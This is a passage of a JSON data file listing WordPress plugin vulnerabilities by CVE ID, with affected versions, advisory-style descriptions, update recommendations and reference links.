{"CVE_ID":"CVE-2025-5961","slug":"wpvivid-backuprestore","versionImpact":"0.9.116","versionEndExcluding":"0.9.117","description":"The Migration, Backup, Staging \u2013 WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'wpvivid_upload_import_files' function in all versions up to, and including, 0.9.116. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. NOTE: Uploaded files are only accessible on WordPress instances running on the NGINX web server as the existing .htaccess within the target file upload folder prevents access on Apache servers.","recommendation":"Update to version 0.9.117, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-5961\",\"name\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-5961\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid-export-import.php#L2210\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid-export-import.php#L2210\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid-export-import.php#L2235\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid-export-import.php#L2235\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid-export-import.php#L2246\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid-export-import.php#L2246\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3320877\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3320877\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-5961\\\/\",\"name\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-5961\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8ceb4a1-9354-4ed3-9a8f-45ba2057a810?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8ceb4a1-9354-4ed3-9a8f-45ba2057a810?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13869","slug":"wpvivid-backuprestore","versionImpact":"0.9.112","versionEndExcluding":"0.9.113","description":"The Migration, Backup, Staging \u2013 WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'upload_files' function in all versions up to, and including, 0.9.112. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. NOTE: Uploaded files are only accessible on WordPress instances running on the NGINX web server as the existing .htaccess within the target file upload folder prevents access on Apache servers.","recommendation":"Update to version 0.9.113, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2024-13869\",\"name\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2024-13869\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242904\\\/wpvivid-backuprestore\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242904\\\/wpvivid-backuprestore\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2024-13869\\\/\",\"name\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2024-13869\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0082e46d-fdbe-4ab7-bba3-0681a25d4495?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0082e46d-fdbe-4ab7-bba3-0681a25d4495?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10962","slug":"wpvivid-backuprestore","versionImpact":"0.9.107","versionEndExcluding":"0.9.108","description":"The Migration, Backup, Staging \u2013 WPvivid plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 0.9.107 via deserialization of untrusted input in the 'replace_row_data' and 'replace_serialize_data' functions. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. An administrator must create a staging site to trigger the exploit.","recommendation":"Update to version 0.9.108, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b4eba78-29f2-4357-ab3c-7bc3c20e0e75?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b4eba78-29f2-4357-ab3c-7bc3c20e0e75?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/staging\\\/class-wpvivid-staging-copy-db-ex.php#L1104\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/staging\\\/class-wpvivid-staging-copy-db-ex.php#L1104\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/staging\\\/class-wpvivid-staging-copy-db-ex.php#L1120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/staging\\\/class-wpvivid-staging-copy-db-ex.php#L1120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186082\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186082\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7315","slug":"wpvivid-backuprestore","versionImpact":"0.9.105","versionEndExcluding":"0.9.106","description":"The Migration, Backup, Staging  WordPress plugin before 0.9.106 does not use sufficient randomness in the filename that is created when generating a backup, which could be bruteforced by attackers to leak sensitive information about said backups.","recommendation":"Update to version 0.9.106, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/456b728b-a451-4afb-895f-850ddc4fb589\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/456b728b-a451-4afb-895f-850ddc4fb589\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10119","slug":"view-all-posts-pages","versionImpact":"0.9.0","versionEndExcluding":"0.9.1","description":"A vulnerability, which was classified as problematic, has been found in View All Posts Page Plugin up to 0.9.0 on WordPress. This issue affects the function action_admin_notices_activation of the file view-all-posts-pages.php. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 0.9.1 is able to address this issue. The patch is named bf914f3a59063fa4df8fd4925ae18a5d852396d7. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-233363.","recommendation":"Update to version 0.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/view-all-posts-pages\\\/commit\\\/bf914f3a59063fa4df8fd4925ae18a5d852396d7\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/view-all-posts-pages\\\/commit\\\/bf914f3a59063fa4df8fd4925ae18a5d852396d7\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.233363\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.233363\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.233363\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.233363\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36836","slug":"wp-fastest-cache","versionEndExcluding":"0.9.0.3","description":"The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized arbitrary file deletion in versions up to, and including, 0.9.0.2 due to a lack of capability checking and insufficient path validation. This makes it possible for authenticated users with minimal permissions to delete arbitrary files from the server.","recommendation":"Update to version 0.9.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82f80916-37ab-4c5a-9787-2544c620acac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82f80916-37ab-4c5a-9787-2544c620acac?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wearetradecraft.com\\\/advisories\\\/tc-2020-0001\\\/\",\"name\":\"https:\\\/\\\/wearetradecraft.com\\\/advisories\\\/tc-2020-0001\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2235160\\\/wp-fastest-cache\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2235160\\\/wp-fastest-cache\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10124","slug":"most-popular-posts-widget-lite","versionImpact":"0.8","versionEndExcluding":"0.9","description":"A vulnerability was found in Most Popular Posts Widget Plugin up to 0.8 on WordPress. It has been classified as critical. Affected is the function add_views\/show_views of the file functions.php. The manipulation leads to sql injection. It is possible to launch the attack remotely. Upgrading to version 0.9 is able to address this issue. The patch is identified as a99667d11ac8d320006909387b100e9a8b5c12e1. It is recommended to upgrade the affected component. VDB-241026 is the identifier assigned to this vulnerability.","recommendation":"Update to version 0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.241026\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.241026\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/most-popular-posts-widget-lite\\\/commit\\\/a99667d11ac8d320006909387b100e9a8b5c12e1\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/most-popular-posts-widget-lite\\\/commit\\\/a99667d11ac8d320006909387b100e9a8b5c12e1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.241026\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.241026\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12628","slug":"bodi0s-easy-cache","versionImpact":"0.8","versionEndExcluding":"0.9","description":"The bodi0`s Easy cache plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'cache-folder' parameter in all versions up to, and including, 0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3153314%40bodi0s-easy-cache&new=3153314%40bodi0s-easy-cache&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3153314%40bodi0s-easy-cache&new=3153314%40bodi0s-easy-cache&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.getastra.com\\\/blog\\\/cms\\\/stored-xss-vulnerability-in-bodi0\\\/\",\"name\":\"https:\\\/\\\/www.getastra.com\\\/blog\\\/cms\\\/stored-xss-vulnerability-in-bodi0\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/087034aa-efd0-44b9-9a2f-3a625806bcaa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/087034aa-efd0-44b9-9a2f-3a625806bcaa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6994","slug":"list-category-posts","versionImpact":"0.89.3","versionEndExcluding":"0.89.4","description":"The List category posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'catlist' shortcode in all versions up to, and including, 0.89.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.89.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/611871cc-737f-44e3-baf5-dbaa8bd8eb81?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/611871cc-737f-44e3-baf5-dbaa8bd8eb81?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/list-category-posts\\\/trunk\\\/include\\\/lcp-wrapper.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/list-category-posts\\\/trunk\\\/include\\\/lcp-wrapper.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/list-category-posts\\\/trunk\\\/list-category-posts.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/list-category-posts\\\/trunk\\\/list-category-posts.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3018689%40list-category-posts&new=3018689%40list-category-posts&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3018689%40list-category-posts&new=3018689%40list-category-posts&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5292","slug":"acf-extended","versionImpact":"0.8.9.3","versionEndExcluding":"0.8.9.4","description":"The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'acfe_form' shortcode in versions up to, and including, 0.8.9.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.8.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-extended\\\/tags\\\/0.8.9.4\\\/includes\\\/modules\\\/form\\\/module-form-front.php#L669\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-extended\\\/tags\\\/0.8.9.4\\\/includes\\\/modules\\\/form\\\/module-form-front.php#L669\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcbe0c72-d518-45d3-a220-896a51071b26?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcbe0c72-d518-45d3-a220-896a51071b26?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-extended\\\/tags\\\/0.8.9.3\\\/includes\\\/modules\\\/form\\\/module-form-front.php#L669\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-extended\\\/tags\\\/0.8.9.3\\\/includes\\\/modules\\\/form\\\/module-form-front.php#L669\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2972880\\\/acf-extended#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2972880\\\/acf-extended#file4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9629","slug":"cf7-telegram","versionImpact":"0.8.5","versionEndExcluding":"0.8.6","description":"The Contact Form 7 + Telegram plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'wpcf7_Telegram::ajax' function in versions up to, and including, 0.8.5. This makes it possible for authenticated attackers, with subscriber-level access and above, to approve, pause and refuse subscriptions.","recommendation":"Update to version 0.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f330fa5a-b471-45ee-a2a6-3ae8f3941bfe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f330fa5a-b471-45ee-a2a6-3ae8f3941bfe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-telegram\\\/tags\\\/0.8.4\\\/classes\\\/wpcf7telegram.php#L537\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-telegram\\\/tags\\\/0.8.4\\\/classes\\\/wpcf7telegram.php#L537\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176353\\\/cf7-telegram#file21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176353\\\/cf7-telegram#file21\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0177","slug":"like-box","versionEndExcluding":"0.8.41","description":"The Social Like Box and Page by WpDevArt WordPress plugin before 0.8.41 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/712c2154-37f4-424c-ba3b-26ba6aa95bca\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/712c2154-37f4-424c-ba3b-26ba6aa95bca\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13889","slug":"wordpress-importer","versionImpact":"0.8.3","versionEndExcluding":"0.8.4","description":"The WordPress Importer plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 0.8.3 via deserialization of untrusted input in the 'maybe_unserialize' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"Update to version 0.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-importer\\\/trunk\\\/class-wp-import.php#L602\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-importer\\\/trunk\\\/class-wp-import.php#L602\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-importer\\\/trunk\\\/class-wp-import.php#L857\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-importer\\\/trunk\\\/class-wp-import.php#L857\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-importer\\\/trunk\\\/class-wp-import.php#L891\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-importer\\\/trunk\\\/class-wp-import.php#L891\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-importer\\\/trunk\\\/class-wp-import.php#L975\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-importer\\\/trunk\\\/class-wp-import.php#L975\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261419\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261419\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f0795f7-6eba-4ff0-b0da-5d2b544adf14?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f0795f7-6eba-4ff0-b0da-5d2b544adf14?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5669","slug":"featured-image-caption","versionImpact":"0.8.10","versionEndExcluding":"0.8.11","description":"The Featured Image Caption plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode and post meta in all versions up to, and including, 0.8.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.8.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c43a88c-6374-414f-97ae-26ba15d75cdc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c43a88c-6374-414f-97ae-26ba15d75cdc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-caption\\\/trunk\\\/classes\\\/MetaBox.php?rev=2300545#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-caption\\\/trunk\\\/classes\\\/MetaBox.php?rev=2300545#L91\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-caption\\\/trunk\\\/classes\\\/MetaBox.php?rev=2300545#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-caption\\\/trunk\\\/classes\\\/MetaBox.php?rev=2300545#L92\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7710","slug":"bravepopup-pro","versionImpact":"0.7.7","versionEndExcluding":"0.8.0","description":"The Brave Conversion Engine (PRO) plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 0.7.7. This is due to the plugin not properly restricting a claimed identity while authenticating with Facebook. This makes it possible for unauthenticated attackers to log in as other users, including administrators.","recommendation":"Update to version 0.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/getbrave.io\\\/brave-pro-changelog\\\/\",\"name\":\"https:\\\/\\\/getbrave.io\\\/brave-pro-changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/604249c6-b23a-40e9-984d-2014f5c97249?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/604249c6-b23a-40e9-984d-2014f5c97249?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24559","slug":"qyrr-code","versionImpact":"0.7","versionEndExcluding":"0.8","description":"The Qyrr WordPress plugin before 0.7 does not escape the data-uri of the QR Code when outputting it in a src attribute, allowing for Cross-Site Scripting attacks. Furthermore, the data_uri_to_meta AJAX action, available to all authenticated users, only had a CSRF check in place, with the nonce available to users with a role as low as Contributor allowing any user with such role (and above) to set a malicious data-uri in arbitrary QR Code posts, leading to a Stored Cross-Site Scripting issue.","recommendation":"Update to version 0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/65a29976-163a-4bbf-a4e8-590ddc4b83f2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/65a29976-163a-4bbf-a4e8-590ddc4b83f2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0372","slug":"embedstories","versionEndExcluding":"0.7.5","description":"The EmbedStories WordPress plugin before 0.7.5 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9cf90ad8-4aa4-466c-a33e-4f2706815765\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9cf90ad8-4aa4-466c-a33e-4f2706815765\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1286","slug":"pmpro-membership-maps","versionEndExcluding":"0.7","description":"The pmpro-membership-maps WordPress plugin before 0.7 does not prevent users with at least the contributor role from leaking sensitive information about users with a membership on the site.","recommendation":"Update to version 0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/49dc9ca3-d0ef-4a75-8b51-307e3e44e91b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/49dc9ca3-d0ef-4a75-8b51-307e3e44e91b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5997","slug":"duplica","versionImpact":"0.6","versionEndExcluding":"0.7","description":"The Duplica \u2013 Duplicate Posts, Pages, Custom Posts or Users plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the duplicate_user and duplicate_post functions in all versions up to, and including, 0.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create duplicates of users and posts\/pages.","recommendation":"Update to version 0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/605fac87-e1e8-4354-a9d3-4440e54bc161?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/605fac87-e1e8-4354-a9d3-4440e54bc161?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duplica\\\/tags\\\/0.6\\\/src\\\/AJAX.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duplica\\\/tags\\\/0.6\\\/src\\\/AJAX.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duplica\\\/tags\\\/0.6\\\/src\\\/AJAX.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duplica\\\/tags\\\/0.6\\\/src\\\/AJAX.php#L98\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0270","slug":"yamaps","versionEndExcluding":"0.6.26","description":"The YaMaps for WordPress Plugin WordPress plugin before 0.6.26 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca3ca694-54ca-4e7e-82e6-33aa240754e1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca3ca694-54ca-4e7e-82e6-33aa240754e1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5987","slug":"wp-accessibility-helper","versionImpact":"0.6.2.8","versionEndExcluding":"0.6.2.9","description":"The WP Accessibility Helper (WAH) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_contrast_variations' and 'save_empty_contrast_variations' functions in all versions up to, and including, 0.6.2.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to edit or delete contrast settings.  Please note these issues were patched in 0.6.2.8, though it broke functionality and the vendor has not responded to our follow-ups.","recommendation":"Update to version 0.6.2.9, or a newer patched 